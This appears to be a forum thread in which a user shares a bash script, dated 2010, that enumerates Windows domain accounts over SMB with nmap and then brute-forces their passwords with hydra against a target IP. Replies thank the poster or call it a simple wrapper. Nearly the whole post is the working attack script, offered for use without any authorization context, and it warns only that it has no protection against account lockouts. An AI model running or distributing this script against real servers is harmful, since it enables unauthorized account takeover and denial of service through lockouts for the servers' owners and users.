[BASH] Domain Account Bruteforce

[PuRiCeL]

 #!/bin/sh

echo
echo "*******************************************************"
echo "*                                                     *"
echo "*  Welcome to the Domain Account Bruteforce Tool.     *"
echo "*             By Sean gambles 21st Sep 2010           *"
echo "*******************************************************"
echo
echo "This tool makes use of the nmap smb-enum-users script,"
echo "by basically exporting the results, in a cleaned up form"
echo "into hydra for bruteforcing."
echo
echo "Currently, only working with server 2000, 2003 family."
echo "This is due to server 2008 not allowing unauthenticated"
echo "account enumeration."
echo
echo "*** Please observe account lockout thresholds before"
echo "submitting your password file into this tool, as there"
echo "is no protection against lockouts taking place. ***"
echo
echo "Please enter the target server IP :"
read target
echo "Please enter the path to your password file"
echo "E.g /root/passwords.txt"
read passfile
echo "Enumerating users, please wait...."
nmap -p139,445 -n $target --script=smb-enum-users >/root/nmap-users.txt

#Cleans up the user list file by removing template accounts and computer names.
cat /root/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//' >users.txt
rm /root/nmap-users.txt
echo "Trying passwords against all the user accounts, please wait...."
hydra $target smbnt -s445 -L/root/users.txt -P $passfile -t1 -e n -m D >/root/results.txt
rm /root/users.txt
echo "*********************************************************"
echo
echo "Domain accounts found :"
echo
cat results.txt |grep login: |cut -d" " -f6-11 

[IceCrash]

bravo Puricel pentru sharing

[Zatarra]

Necesita nmap & hydra.. e doar un script, nu e cine stie ce

[PuRiCeL]

IceCrash thx